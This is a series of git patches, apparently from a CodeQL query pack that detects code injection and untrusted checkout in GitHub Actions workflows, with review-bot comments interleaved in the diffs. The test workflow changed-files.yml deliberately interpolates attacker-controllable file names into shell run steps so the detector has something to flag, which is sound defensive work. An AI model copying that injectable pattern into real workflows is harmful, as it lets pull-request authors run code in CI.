| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | From b22e305699b1a3e56cb20dcf05db14ae8ece50d2 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 6 May 2024 23:32:42 +0200
Subject: [PATCH 241/707] Fix untrusted checkout tests
---
 ...or.expected => PrivilegedUntrustedCheckoutCritical.expected} | 0 .../Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref | 1 + ...arning.expected => PrivilegedUntrustedCheckoutHigh.expected} | 2 +- .../Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref | 1 + .../query-tests/Security/CWE-829/UntrustedCheckoutError.qlref | 1 - .../query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref | 1 - 6 files changed, 3 insertions(+), 3 deletions(-) rename ql/test/query-tests/Security/CWE-829/{UntrustedCheckoutError.expected => PrivilegedUntrustedCheckoutCritical.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref rename ql/test/query-tests/Security/CWE-829/{UntrustedCheckoutWarning.expected => PrivilegedUntrustedCheckoutHigh.expected} (97%) create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected
rename to ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref
new file mode 100644
index 000000000000..8fe52c7d9147
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref
@@ -0,0 +1 @@
+Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected
similarity index 97%
rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected
rename to ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected
index 628234f7e8b4..dc5a6bc915fc 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected
+++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected
@@ -1,4 +1,4 @@
-| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
+j .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref
new file mode 100644
index 000000000000..32953132a45a
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref
@@ -0,0 +1 @@
+Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref
deleted file mode 100644
index 1192fcfe6168..000000000000
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref
+++ /dev/null
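Review bot: The first row of the renamed `PrivilegedUntrustedCheckoutHigh.expected` now starts with `j ` instead of `| ` — the only content change in this 97%-similar rename — which looks like a stray editor keystroke rather than an intended update, and it leaves the expected output malformed so the renamed test cannot pass as committed. Restore the row to `| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |`; regenerating the file with the test runner instead of hand-editing it would avoid this class of slip.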
@@ -1 +0,0 @@ -Security/CWE-829/UntrustedCheckoutError.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref deleted file mode 100644 index 8c77a95b48c7..000000000000 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-829/UntrustedCheckoutWarning.ql From 5d6a3c4900d427da833674a18796601c8e202a12 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Tue, 7 May 2024 09:45:12 +0200 Subject: [PATCH 242/707] Copy master branch only --- .github/workflows/copy-to-bughalla.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 572d987ce377..a6b568f2bfb2 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -1,6 +1,9 @@ name: Copy to Bughalla -on: push +on: + push: + branches: + - 'master' permissions: contents: read From 778c6ad923c5164cb86ff53f0e3ac461830d5f77 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 7 May 2024 10:41:42 +0200 Subject: [PATCH 243/707] Fix tj-actions/changed-files sources --- .../codeql/actions/dataflow/FlowSources.qll | 38 +++++++++++- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 60 +++++++++++++------ ql/lib/ext/tj-actions_changed-files.model.yml | 22 ------- .../tj-actions_verify-changed-files.model.yml | 6 -- .../.github/workflows/changed-files.yml | 29 +++++++-- .../Security/CWE-094/CodeInjection.expected | 12 ++-- .../CWE-094/PrivilegedCodeInjection.expected | 9 ++- 7 files changed, 117 insertions(+), 59 deletions(-) delete mode 100644 ql/lib/ext/tj-actions_changed-files.model.yml delete mode 100644 ql/lib/ext/tj-actions_verify-changed-files.model.yml 
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index db111b9e1900..b4cf1f70315c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -263,7 +263,7 @@ private class ArtifactSource extends RemoteFlowSource { /** * A list of file names returned by dorny/paths-filter. */ -private class DornyPathsFilterSource extends RemoteFlowSource { +class DornyPathsFilterSource extends RemoteFlowSource { DornyPathsFilterSource() { exists(UsesStep u | u.getCallee() = "dorny/paths-filter" and @@ -274,3 +274,39 @@ private class DornyPathsFilterSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } } + +/** + * A list of file names returned by tj-actions/changed-files. + */ +class TJActionsChangedFilesSource extends RemoteFlowSource { + TJActionsChangedFilesSource() { + exists(UsesStep u | + u.getCallee() = "tj-actions/changed-files" and + ( + u.getArgument("safe_output") = "false" or + u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 41 + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } +} + +/** + * A list of file names returned by tj-actions/verify-changed-files. + */ +class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { + TJActionsVerifyChangedFilesSource() { + exists(UsesStep u | + u.getCallee() = "tj-actions/verify-changed-files" and + ( + u.getArgument("safe_output") = "false" or + u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 17 + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 32c329d8c67c..cb391f2a2620 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
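Review bot: The version test in TJActionsChangedFilesSource, `u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 41`, has no result when the ref is not a numeric tag (a pinned commit SHA, a branch name, a tag such as `v40-rc1`), so a SHA-pinned use of a pre-41 release is silently treated as safe unless `safe_output: false` is also set; the `< 17` check in TJActionsVerifyChangedFilesSource has the same gap. Pinning to a full SHA is the recommended practice for third-party actions, so this is the common case rather than an edge case. The parsing chain is also duplicated verbatim in both classes; a single accessor on UsesStep would keep it in one place, and the non-numeric case needs explicit handling rather than falling through to "not a source". A short QLdoc sentence on each class stating which versions are considered unsafe and why (`safe_output` default) would document the contract the thresholds encode.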
@@ -5,6 +5,7 @@ private import actions private import codeql.util.Unit private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery @@ -43,10 +44,6 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { ) } -class EnvToRunTaintStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) } -} - /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. * e.g. 
@@ -119,28 +116,57 @@ predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) { ) } -class ArtifactDownloadToUseTaintStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - artifactDownloadToUseStep(node1, node2) - } -} - /** * A read of the _files field of the dorny/paths-filter action. */ predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(UsesStep u, StepsExpression o | - u.getCallee() = "dorny/paths-filter" and - u.getArgument("list-files") = ["csv", "json"] and - u = pred.asExpr() and - o.getStepId() = u.getId() and + exists(StepsExpression o | + pred instanceof DornyPathsFilterSource and + o.getStepId() = pred.asExpr().(UsesStep).getId() and o.getFieldName().matches("%_files") and succ.asExpr() = o ) } -class DornyPathsFilterTaintStep extends AdditionalTaintStep { +/** + * A read of user-controlled field of the tj-actions/changed-files action. + */ +predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = + [ + "added_files", "copied_files", "deleted_files", "modified_files", "renamed_files", + "all_old_new_renamed_files", "type_changed_files", "unmerged_files", "unknown_files", + "all_changed_and_modified_files", "all_changed_files", "other_changed_files", + "all_modified_files", "other_modified_files", "other_deleted_files", "modified_keys", + "changed_keys" + ] and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the tj-actions/verify-changed-files action. 
+ */ +predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "changed_files" and + succ.asExpr() = o + ) +} + +class TaintSteps extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - dornyPathsFilterTaintStep(node1, node2) + envToRunStep(node1, node2) or + artifactDownloadToUseStep(node1, node2) or + dornyPathsFilterTaintStep(node1, node2) or + tjActionsChangedFilesTaintStep(node1, node2) or + tjActionsVerifyChangedFilesTaintStep(node1, node2) } } diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml deleted file mode 100644 index 60fa01495733..000000000000 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ /dev/null 
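Review bot: tjActionsVerifyChangedFilesTaintStep tests `pred instanceof TJActionsChangedFilesSource`, the changed-files source, so a verify-changed-files step is never matched by this step while a changed-files step is offered a `changed_files` field it does not produce; the guard should read `pred instanceof TJActionsVerifyChangedFilesSource and`. The field name also differs from the model removed in this same commit (`output.changed-files` in tj-actions_verify-changed-files.model.yml), so it is worth confirming against the action's metadata which spelling the output actually uses. The merged TaintSteps class replaces the per-step classes removed above, which is fine, but a one-line comment such as `// All AdditionalTaintStep contributions of this file are registered here.` would save the next reader the search.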
@@ -1,22 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["tj-actions/changed-files", "*", "output.added_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.copied_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "filename", "manual"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml deleted file mode 100644 index 9dccf6d5e6c6..000000000000 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ /dev/null 
@@ -1,6 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml index 12bade510ba4..85f59f6fa269 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml @@ -2,8 +2,6 @@ name: CI on: pull_request: - branches: - - main jobs: changed_files: @@ -13,13 +11,32 @@ jobs: - uses: actions/checkout@v4 with: fetch-depth: 0 - - name: Get changed files - id: changed-files + + - name: Get changed files 1 + id: changed-files1 uses: tj-actions/changed-files@v40 + - name: List all changed files 1 + run: | + for file in ${{ steps.changed-files1.outputs.all_changed_files }}; do + echo "$file was changed" + done - - name: List all changed files + - name: Get changed files 2 + id: changed-files2 + uses: tj-actions/changed-files@v41 + - name: List all changed files 2 run: | - for file in ${{ steps.changed-files.outputs.all_changed_files }}; do + for file in ${{ steps.changed-files2.outputs.all_changed_files }}; do echo "$file was changed" done + - name: Get changed files 3 + id: changed-files3 + uses: tj-actions/changed-files@v41 + with: + safe_output: false + - name: List all changed files 3 + run: | + for file in ${{ steps.changed-files3.outputs.all_changed_files }}; do + echo "$file was changed" + done diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index e220d368b20b..e9738fa9458f 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -6,7 +6,8 @@ edges | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$( Date: Tue, 7 May 2024 11:01:14 +0200 Subject: [PATCH 244/707] Update --- ql/test/library-tests/test.expected | 18 ------------------ .../PrivilegedUntrustedCheckoutHigh.expected | 2 +- 2 files changed, 1 insertion(+), 19 deletions(-) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index d7f944c5a3dc..c735596ae053 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -455,24 +455,6 @@ sources | tj-actions/branch-names | * | output.current_branch | branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | branch | manual | | tj-actions/branch-names | * | output.ref_branch | branch | manual | -| tj-actions/changed-files | * | output.added_files | filename | manual | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | filename | manual | -| tj-actions/changed-files | * | output.all_changed_files | filename | manual | -| tj-actions/changed-files | * | output.all_modified_files | filename | manual | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | filename | manual | -| tj-actions/changed-files | * | output.changed_keys | filename | manual | -| tj-actions/changed-files | * | output.copied_files | filename | manual | -| tj-actions/changed-files | * | output.deleted_files | filename | manual | -| tj-actions/changed-files | * | output.modified_files | filename | manual | -| tj-actions/changed-files | * | output.modified_keys | filename | manual | -| tj-actions/changed-files | * | output.other_changed_files | filename | manual | -| tj-actions/changed-files | * | output.other_deleted_files | filename | manual | -| tj-actions/changed-files | * | output.other_modified_files | filename | manual | -| tj-actions/changed-files | * | output.renamed_files | filename | manual | -| tj-actions/changed-files | * | output.type_changed_files | filename | manual | -| tj-actions/changed-files | * | output.unknown_files | filename | manual | -| tj-actions/changed-files | * | output.unmerged_files | filename | manual | -| tj-actions/verify-changed-files | * | output.changed-files | filename | manual | | trilom/file-changes-action | * | output.files | filename | manual | | trilom/file-changes-action | * | output.files_added | filename | manual | | trilom/file-changes-action | * | output.files_modified | filename | manual | 
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected index dc5a6bc915fc..628234f7e8b4 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected @@ -1,4 +1,4 @@ -j .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 6a87192f6491a36d107c49e871228cf6488721a1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 09:42:56 +0200 Subject: [PATCH 245/707] Account for insecure action versions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 12 +++-- .../codeql/actions/dataflow/FlowSources.qll | 51 ++++++++++++++++++- .../.github/workflows/changed-files.yml | 18 +++++++ .../Security/CWE-094/CodeInjection.expected | 4 ++ .../CWE-094/PrivilegedCodeInjection.expected | 3 ++ .../CWE-829/UnpinnedActionsTag.expected | 32 ++++++------ 6 files changed, 98 insertions(+), 22 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0cbb8ab10ed9..83787882d6fa 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -791,6 +791,8 @@ abstract class UsesImpl extends AstNodeImpl { abstract string getVersion(); + int getMajorVersion() { result = this.getVersion().regexpReplaceAll("\\..*", "").toInt() } + /** Gets the argument expression for the given key. */ string getArgument(string key) { exists(ScalarValueImpl scalar | @@ -832,8 +834,10 @@ class UsesStepImpl extends StepImpl, UsesImpl { ).toLowerCase() } - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } + /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ + override string getVersion() { + result = u.getValue().regexpCapture(usesParser(), 3).regexpReplaceAll("^v", "") + } override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" @@ -865,12 +869,12 @@ class ExternalJobImpl extends JobImpl, UsesImpl { u.getValue().regexpCapture(repoUsesParser(), 3) } - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | n.lookup("uses") = name and if not name.getValue().matches("\\.%") - then result = name.getValue().regexpCapture(repoUsesParser(), 4) + then result = name.getValue().regexpCapture(repoUsesParser(), 4).regexpReplaceAll("^v", "") else none() ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b4cf1f70315c..bfe85dbdbe6a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
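Review bot: Stripping the `v` prefix inside getVersion changes what every caller sees, not just getMajorVersion: the UnpinnedActionsTag expectations updated in this same commit now read "with ref '2'" for a workflow that says `@v2`, so the alert message no longer quotes the ref the user actually wrote. Keep getVersion faithful to the workflow text and move the normalisation into the new accessor, `int getMajorVersion() { result = this.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() }`, reverting the two getVersion overrides to their previous bodies. getMajorVersion also lacks a doc comment; something like `/** Gets the numeric major component of the version ref, e.g. 2 for v2 or 2.1.0; no result for SHAs, branches or other non-numeric refs. */` states the contract the flow sources rely on. The enclosing UsesImpl, UsesStepImpl and ExternalJobImpl classes continue outside these hunks.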
@@ -284,7 +284,54 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { u.getCallee() = "tj-actions/changed-files" and ( u.getArgument("safe_output") = "false" or - u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 41 + u.getMajorVersion() < 41 or + u.getVersion() + .matches([ + "56284d8", "9454999", "1c93849", "da093c1", "25ef392", "18c8a4e", "4052680", + "bfc49f4", "af292f1", "56284d8", "fea790c", "95690f9", "408093d", "db153ba", + "8238a41", "4196030", "a21a533", "8e79ba7", "76c4d81", "6ee9cdc", "246636f", + "48566bb", "fea790c", "1aee362", "2f7246c", "0fc9663", "c860b5c", "2f8b802", + "b7f1b73", "1c26215", "17f3fec", "1aee362", "a0585ff", "87697c0", "85c8b82", + "a96679d", "920e7b9", "de0eba3", "3928317", "68b429d", "2a968ff", "1f20fb8", + "87e23c4", "54849de", "bb33761", "ec1e14c", "2106eb4", "e5efec4", "5817a9e", + "a0585ff", "54479c3", "e1754a4", "9bf0914", "c912451", "174a2a6", "fb20f4d", + "07e0177", "b137868", "1aae160", "5d2fcdb", "9ecc6e7", "8c9ee56", "5978e5a", + "17c3e9e", "3f7b5c9", "cf4fe87", "043929e", "4e2535f", "652648a", "9ad1a5b", + "c798a4e", "25eaddf", "abef388", "1c2673b", "53c377a", "54479c3", "039afcd", + "b2d17f5", "4a0aac0", "ce810b2", "7ecfc67", "b109d83", "79adacd", "6e426e6", + "5e2d64b", "e9b5807", "db5dd7c", "07f86bc", "3a3ec49", "ee13744", "cda2902", + "9328bab", "4e680e1", "bd376fb", "84ed30e", "74b06ca", "5ce975c", "04124ef", + "3ee6abf", "23e3c43", "5a331a4", "7433886", "d5414fd", "7f2aa19", "210cc83", + "db3ea27", "57d9664", "0953088", "0562b9f", "487675b", "9a6dabf", "7839ede", + "c2296c1", "ea251d4", "1d1287f", "392359f", "7f33882", "1d8a2f9", "0626c3f", + "a2b1e5d", "110b9ba", "039afcd", "ce4b8e3", "3b6c057", "4f64429", "3f1e44a", + "74dc2e8", "8356a01", "baaf598", "8a4cc4f", "8a7336f", "3996bc3", "ef0a290", + "3ebdc42", "94e6fba", "3dbb79f", "991e8b3", "72d3bb8", "72d3bb8", "5f89dc7", + "734bb16", "d2e030b", "6ba3c59", "d0e4477", "b91acef", "1263363", "7184077", + "cbfb0fd", 
"932dad3", "9f28968", "c4d29bf", "ce4b8e3", "aa52cfc", "aa52cfc", + "1d6e210", "8953e85", "8de562e", "7c640bd", "2706452", "1d6e210", "dd7c814", + "528984a", "75af1a4", "5184a75", "dd7c814", "402f382", "402f382", "f7a5640", + "df4daca", "602081b", "6e12407", "c5c9b6f", "c41b715", "60f4aab", "82edb42", + "18edda7", "bec82eb", "f7a5640", "28ac672", "602cf94", "5e56dca", "58ae566", + "7394701", "36e65a1", "bf6ddb7", "6c44eb8", "b2ee165", "34a865a", "fb1fe28", + "ae90a0b", "bc1dc8f", "3de1f9a", "0edfedf", "2054502", "944a8b8", "581eef0", + "e55f7fb", "07b38ce", "d262520", "a6d456f", "a59f800", "a2f1692", "72aab29", + "e35d0af", "081ee9c", "1f30bd2", "227e314", "ffd30e8", "f5a8de7", "0bc7d40", + "a53d74f", "9335416", "4daffba", "4b1f26a", "09441d3", "e44053b", "c0dba81", + "fd2e991", "2a8a501", "a8ea720", "88edda5", "be68c10", "b59431b", "68bd279", + "2c85495", "f276697", "00f80ef", "f56e736", "019a09d", "3b638a9", "b42f932", + "8dfe0ee", "aae164d", "09a8797", "b54a7ae", "902e607", "2b51570", "040111b", + "3b638a9", "1d34e69", "b86b537", "2a771ad", "75933dc", "2c0d12b", "7abdbc9", + "675ab58", "8c6f276", "d825b1f", "0bd70b7", "0fe67a1", "7bfa539", "d679de9", + "1e10ed4", "0754fda", "d290bdd", "15b1769", "2ecd06d", "5fe8e4d", "7c66aa2", + "2ecd06d", "e95bba8", "7852058", "81f32e2", "450eadf", "0e956bb", "300e935", + "fcb2ab8", "271bbd6", "e8ace01", "473984b", "032f37f", "3a35bdf", "c2216f6", + "0f16c26", "271468e", "fb063fc", "a05436f", "c061ef1", "489e2d5", "8d5a33c", + "fbfaba5", "1980f55", "a86b560", "f917cc3", "e18ccae", "e1d275d", "00f80ef", + "9c1a181", "5eaa2d8", "188487d", "3098891", "467d26c", "d9eb683", "09a8797", + "8e7cc77", "81ad4b8", "5e2a2f1", "1af9ab3", "55a857d", "62a9200", "b915d09", + "f0751de", "eef9423" + ] + "%") ) and this.asExpr() = u ) 
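Review bot: The hard-coded `matches([...] + "%")` list has no comment saying what it contains or how it was produced; from the surrounding conditions it appears to be 7-character prefixes of commits belonging to releases older than v41, but a maintainer should not have to infer that. The list also contains repeated entries (`56284d8`, `fea790c`, `aa52cfc`, `72d3bb8`, `1d6e210`, `402f382` and several others appear twice), which suggests it was assembled by hand and will be hard to keep current. This data belongs in an extensible model file (the kind deleted in PATCH 243) or at least in a named predicate such as `private predicate tjActionsChangedFilesUnsafeSha(string prefix)` with a header comment stating the source and cut-off release, so the source class stays readable and the list can be regenerated. The enclosing exists() and class continue outside the hunk.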
